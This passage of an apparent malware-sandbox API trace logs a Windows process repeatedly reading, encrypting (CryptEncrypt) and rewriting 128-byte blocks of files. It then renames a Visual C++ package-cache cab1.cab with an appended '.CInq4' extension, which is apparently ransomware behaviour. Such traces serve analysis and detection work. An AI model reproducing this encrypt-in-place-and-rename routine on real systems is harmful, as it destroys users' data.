dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.846] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.846] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.846] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.846] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.846] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.846] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.846] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.846] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.847] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.847] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.847] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.847] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.847] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.847] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.847] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.847] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.847] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.847] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.847] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.847] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.847] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.847] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.847] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.847] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.847] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.847] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.847] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.847] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.847] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.847] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.847] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.847] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.847] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.848] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.848] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.848] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.848] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.848] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.848] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.848] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.848] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.848] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.848] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.848] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.848] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.848] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.848] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.849] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.849] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.849] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.849] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.849] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.849] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.849] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.849] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.849] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.849] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.849] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.849] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.849] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.849] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.849] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.849] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.849] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.849] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.849] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.850] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.850] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.850] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.850] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.850] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.850] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.850] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.850] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.850] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.850] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.850] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.850] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.850] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.850] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.850] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.850] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.192] MoveFileW (lpExistingFileName="c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\cab1.cab"), lpNewFileName="c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\cab1.cab.CInq4" (normalized: "c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\cab1.cab.cinq4")) returned 1 [0041.226] CreateFileW (lpFileName="c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\cab1.cab"), dwDesiredAccess=0x1, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0041.226] CreateFileW (lpFileName="c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\cab1.cab"), dwDesiredAccess=0x2, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0041.226] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.228] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.228] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.228] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.228] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.228] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.228] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.228] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.228] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.228] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.228] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.228] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.229] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.229] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.229] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.229] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 